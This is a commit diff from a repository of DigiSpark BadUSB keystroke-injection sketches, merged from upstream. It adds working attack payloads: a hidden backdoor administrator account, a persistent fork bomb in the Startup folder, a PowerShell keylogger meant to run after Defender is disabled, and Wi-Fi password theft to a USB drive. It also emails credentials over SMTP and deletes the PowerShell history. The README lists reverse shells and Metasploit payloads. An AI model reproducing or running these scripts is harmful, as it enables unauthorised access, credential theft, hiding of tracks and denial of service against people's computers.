adil
/
DigiSpark-Scripts
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #1 from CedArctic/master 

Merge with upstream branch
This commit is contained in:
Tudor Velican 2020-05-27 22:10:59 +02:00 committed by GitHub
parent 168147dcaa bd7146b6df
commit d6ca5a2e5d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
13 changed files with 166 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
Create_Account/Create_Account.ino
View File

@ -1,11 +1,9 @@
//This DigiSpark script creates new local user and adds it to "Administrators" group
//Tested on Windows 10 with English(US) keyboard layout
//Created by Michyus
//Created by Michyus | Edited by Elshan
#include "DigiKeyboard.h"
void setup() {
}
void loop() {
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
@ -20,7 +18,21 @@ void loop() {
DigiKeyboard.print(F("powershell $pass = ConvertTo-SecureString \"P@ssW0rD\" -AsPlainText -Force; New-LocalUser \"accName\" -Password $pass; Add-LocalGroupMember -Group \"Administrators\" -Member \"accName\" "));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
/* I assumed user already have powershell - Try to hide the user account from the login screen*/
DigiKeyboard.print(F("powershell New-Item -Path \"\'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\'\" -Name \"SpecialAccounts\" "));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("powershell New-Item -Path \"\'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts'\" -Name \"UserList\" "));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("powershell New-ItemProperty -Path \"\'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\'\" -Name \"accName\" -Value \"0\" -PropertyType DWORD "));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
/* end hide user section */
DigiKeyboard.print("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){ /*empty*/ }
}
void loop() {
}

0
DNS Poisoner/DNS_Poisoner → DNS Poisoner/DNS_Poisoner.ino
View File

2
Fork_Bomb/Fork_Bomb.ino
View File

@ -19,7 +19,7 @@ void loop() {
DigiKeyboard.sendKeyStroke(KEY_ENTER);
//Run the fork bomb
DigiKeyboard.delay(500);
DigiKeyboard.print(F("for /l %x in (1,1,10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) do start"));
DigiKeyboard.print(F("for /l %x in (0,0,0) do start"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) {
/*Stops the digispark from running the scipt again*/

22
Fork_Bomb/Persistent_Fork_Bomb.ino Normal file
View File

@ -0,0 +1,22 @@
//This script creates fork.bat file which is then run everytime the computer is powered on.
//Crated by Michyus
#include "DigiKeyboard.h"
void setup() {
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("cmd");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("echo for /l %%x in (0, 0, 0) do start > \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fork.bat\""));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){ /*empty*/ }
}

21
Fork_Bomb/README.md Normal file
View File

@ -0,0 +1,21 @@
# Fork_Bomb
## This script does the following:
1. Starts Command prompt
2. Resizes and changes colors of Command prompt
3. Executes fork bomb
# Persistent_Fork_Bomb
## This script does the following:
1. Starts Command prompt
2. Creates fork.bat in Startup directory
3. Exits
# Additional information:
- The `for /l %%x in (0, 0, 0) do start` command will run indefinitely. If you want to limit number of cmd instances change it like this(this will start 10 instances):
```for /l %%x in (1, 1, 10) do start```
- When using Persistent_Fork_Bomb it usually takes few seconds to get started, this depends on hw and how many other programs are in Startup directory. Still this might be hard to remove. If you are unable to remove it using Windows, try to boot another OS(for example debian from live USB https://www.debian.org/CD/live/), then connect it to the disk with Windows installed on it, and you should be able to remove fork.bat from Startup(This won't work if disk with Windows is encrypted).
# Credits
- Fork_Bomb: BlackBoot
- Persistent_Fork_Bomb: https://github.com/Michyus

29
Keylogger/Κeylogger.ino Normal file
View File

@ -0,0 +1,29 @@
/*
* This DigiKeyboard Script runs dasgoll's Powershell keylogger (https://gist.github.com/dasgoll/7ca1c059dd3b3fbc7277)
* for a predefined number of seconds ($timeoutSeconds) and saves the results to mykeypress.txt in
* APPDATA\Local\Temp\mykeypresses.txt. Feel free to chain this script with the logic in WiFi_Profile_Grabber or
* WiFi_Profile_Mailer to retrieve the results.
*
* WARNING: Windows Defender is able to detect this so you will have to chain this after a script disabling Windows Defender.
*/
#include "DigiKeyboard.h"
void setup() {
//empty
}
void loop() {
// Open Powershell
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(5000);
// Write Keylogger Function
DigiKeyboard.print(F("$code = {function My-Keypresses($Path=\"$env:temp\\mykeypress.txt\") \n{\n $signatures = @\'\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] \npublic static extern short GetAsyncKeyState(int virtualKeyCode); \n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\npublic static extern int GetKeyboardState(byte[] keystate);\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\npublic static extern int MapVirtualKey(uint uCode, int uMapType);\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\npublic static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);\n\'@\n\n $API = Add-Type -MemberDefinition $signatures -Name \'Win32\' -Namespace API -PassThru\n \n $null = New-Item -Path $Path -ItemType File -Force\n\n try\n {\n\n while ($true) {\n Start-Sleep -Milliseconds 40\n \n for ($ascii = 9; $ascii -le 254; $ascii++) {\n $state = $API::GetAsyncKeyState($ascii)\n\n if ($state -eq -32767) {\n $null = [console]::CapsLock\n\n $virtualKey = $API::MapVirtualKey($ascii, 3)\n\n $kbstate = New-Object Byte[] 256\n $checkkbstate = $API::GetKeyboardState($kbstate)\n\n $mychar = New-Object -TypeName System.Text.StringBuilder\n\n $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)\n\n if ($success) \n {\n [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) \n }\n }\n }\n }\n }\n finally\n {\n }\n}}; $timeoutSeconds = 10; $j = Start-Job -ScriptBlock $code; if (Wait-Job $j -Timeout $timeoutSeconds) { Receive-Job $j }; Remove-Job -force $j"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){ /*empty*/ }
}

59
README.md
View File

@ -7,27 +7,22 @@ This is a set of hand-written DigiSpark sketches for the Arduino IDE that utiliz
Configure the Arduino IDE for the DigiSpark using: https://digistump.com/wiki/digispark/tutorials/connecting or Seytonic's tutorial: https://youtu.be/fGmGBa-4cYQ. Then download one of scripts (sketches), open them with Arduino IDE, modify them if needed and upload them to the DigiSpark.
# Script Descriptions
>RickRoll_Update : Plays Never Gonna Give you up while performing a fake windows update.
>WallpaperChanger : Downloads and applies a wallpaper via powershell.
>Wallpaper_Prank : Takes a screenshot of the desktop, sets it as the wallpaper, hides desktop icons.
>Talker : Opens up powershell and speaks out a message.
>PowerShell Script Executer : Downloads and runs a powershell script.
>WiFi_Profile_Grabber: Using cmd, extracts wifi profiles and saves the csv to the usb mounted on d:\
>WiFi_Profile_Mailer : Writes the wireless network credentials to a csv file and emails it.
>Fork_Bomb : Opens up an obfuscated windows terminal and makes it multiply itself uncontrolably causing the machine to either lock or crash.
>Rapid_Shell : Seamlessly executes metasploit payloads through powershell.
>Reverse_Shell : Opens a reverse shell in 3 seconds.
>Window_Jammer : Spams ALT + F4 and CTRL + W key combos to force close all active windows.
- **Create_Account**: Creates a new admin account and optionally hides it
- **DNS Poisoner**: Injects lines into the Windows hosts file and redirects URLs to wherever you want
- **Execute_Powershell_Script**: Downloads and executes a powershell script in hidden mode
- **Fork_Bomb**: Opens up an obfuscated windows terminal and makes it multiply itself uncontrolably causing the machine to either lock or crash
- **Rapid_Shell**: Seamlessly executes metasploit payloads through powershell
- **Reverse_Shell**: Opens a netcat reverse shell from a Windows machine to the host
- **RickRoll_Update**: Plays Never Gonna Give you up while performing a fake windows update
- **Silly_Mouse**: Switches primary and secondary mouse buttons, display mouse trails, decreases mouse speed and other mouse related pranks
- **Talker**: Makes the computer speak out a message using powershell
- **Wallpaper_Changer**: Downloads and applies a wallpaper via powershell.
- **Wallpaper_Changer_macOS**: Downloads and applies a wallpaper via applescript on macOS.
- **Wallpaper_Prank**: Takes a screenshot of the desktop, sets it as the wallpaper, hides desktop icons
- **WiFi_Profile_Grabber**: Extracts wifi profiles and saves the csv to a USB drive
- **WiFi_Profile_Mailer**: Writes the wireless network credentials to a csv file and emails it
- **Window_Jammer**: Spams ALT + F4 and CTRL + W key combos to force close all active windows
# See the scripts in action
@ -37,18 +32,22 @@ Click the gifs to see the full video
[![Wallpaper Prank](https://j.gifs.com/32r7ER.gif)](https://www.youtube.com/watch?v=yHPRZnpxvks)
# Credits, contributors and resources:
# Contributors
-samratashok for the Nishang reverse shell used in Reverse_Shell.
- **samratashok**
- **nassimosaz**
- **p0wc0w**
- **apsecdev**
- **BlackBoot**
- **Michyus**
- **Vel1khaN**
- **slipperyavocado**
- **bernsteining**
-nassimosaz for the Rapid_Shell script.
# Resources
-p0wc0w for the original WiFi Grabber and Mailer Scripts.
- USB Rubber Ducky Documentation by hak5darren: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
-BlackBoot for the original fork bomb.
- Digistump DigiSpark Documentation: https://github.com/digistump/DigisparkArduinoIntegration/blob/master/libraries/DigisparkKeyboard/DigiKeyboard.h
-hak5darren for the USB Rubber Ducky Documentation: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
-Digistump for the DigiSpark and their documentation: https://github.com/digistump/DigisparkArduinoIntegration/blob/master/libraries/DigisparkKeyboard/DigiKeyboard.h
-usb.org for the USB Usage IDs on page 53: http://www.usb.org/developers/hidpage/Hut1_12v2.pdf
- USB Usage IDs by usb.org (page 53): http://www.usb.org/developers/hidpage/Hut1_12v2.pdf

2
RickRoll_Update/RickRoll_Update.ino
View File

@ -13,7 +13,7 @@ void loop() {
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(3000);
DigiKeyboard.print("http://fakeupdate.net/win10u/index.html");
DigiKeyboard.print("http://fakeupdate.net/win10ue");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_F11);

11
Wallpaper_Changer_macOS/README.md Normal file
View File

@ -0,0 +1,11 @@
# macOS Wallpaper Changer
This script launches Spotlight to launch Terminal.app in order to download a picture, and sets it as a wallpaper, in less than 3 seconds.
Feel free to change the image link in the script in order to set another image.
Changing the download path (/Users/Shared/wallpaper.jpg) may crash the AppleScript executed to change the wallpaper.
## How to change macOS Wallpaper with the Terminal
https://apple.stackexchange.com/questions/40644/how-do-i-change-desktop-background-with-a-terminal-command

28
Wallpaper_Changer_macOS/Wallpaper_Changer_macOS Normal file
View File

@ -0,0 +1,28 @@
// This script launches Spotlight to launch Terminal.app in order to download a picture, and sets it as a wallpaper, in less than 3 seconds.
// Tested on El Capitan (macOS 10.11.6)
#include "DigiKeyboard.h"
void setup() {
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("Terminal");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print("curl https://tr3.cbsistatic.com/hub/i/2014/05/15/f8964afd-bd82-4e0e-bcbe-e927363dcdc1/3b858e39e2cf183b878f54cad0073a67/codedoge.jpg > /Users/Shared/wallpaper.jpg");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print("osascript -e 'tell application \"Finder\" to set desktop picture to POSIX file \"/Users/Shared/wallpaper.jpg\"'");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_Q, MOD_GUI_LEFT);
for (;;) {
/*Stops the digispark from running the scipt again*/
}
}

17
WiFi_Profile_Grabber/WiFi_Profile_Grabber.ino
View File

@ -1,4 +1,5 @@
//This DigiSpark script writes the wireless network credentials to a csv file in a usb mounted at d:\ - change accordingly.
//This DigiSpark script writes the wireless network credentials to a csv file on a usb drive.
//Change "VolumeName='USB_DRIVE_LABEL'" to reflect your drive's label.
//Credits to p0wc0w.
#include "DigiKeyboard.h"
void setup() {
@ -12,20 +13,8 @@ void loop() {
DigiKeyboard.print("cmd");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("powershell -NoP -NonI -W Hidden -Exec Bypass \"(netsh wlan show profiles) | Select-String '\\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv"));
DigiKeyboard.print(F("powershell -NoP -NonI -W Hidden -Exec Bypass \"(netsh wlan show profiles) | Select-String '\\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv c:\\windows\\temp\\temp.csv; cp c:\\windows\\temp\\temp.csv -destination $((gwmi -Query \\\"Select * from Win32_LogicalDisk where VolumeName='USB_DRIVE_LABEL'\\\").DeviceID); ri c:\\windows\\temp\\temp.csv -force"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("cmd");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("copy temp.csv d:\\"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("del temp.csv"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){ /*empty*/ }

6
WiFi_Profile_Mailer/WiFi_Profile_Mailer_New.ino
View File

@ -16,7 +16,7 @@ void loop() {
DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_A);
DigiKeyboard.delay(500);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("(netsh wlan show profiles) | Select-String '\\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv -Path $env:userprofile\\temp.csv;exit"));
@ -25,7 +25,7 @@ void loop() {
DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_A);
DigiKeyboard.delay(500);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('GMAIL_USERNAME', 'GMAIL_PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDER_MAIL'; $ReportEmail.To.Add('RECEIVER_MAIL'); $ReportEmail.Subject = 'DigiSpark Report'; $ReportEmail.Body = 'Attached is your report. - Regards Your Digispark'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail);exit"));
@ -34,7 +34,7 @@ void loop() {
DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_A);
DigiKeyboard.delay(500);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("del (Get-PSReadlineOption).HistorySavePath;exit"));

2
_config.yml
View File

@ -1 +1 @@
theme: jekyll-theme-hacker
theme: jekyll-theme-architect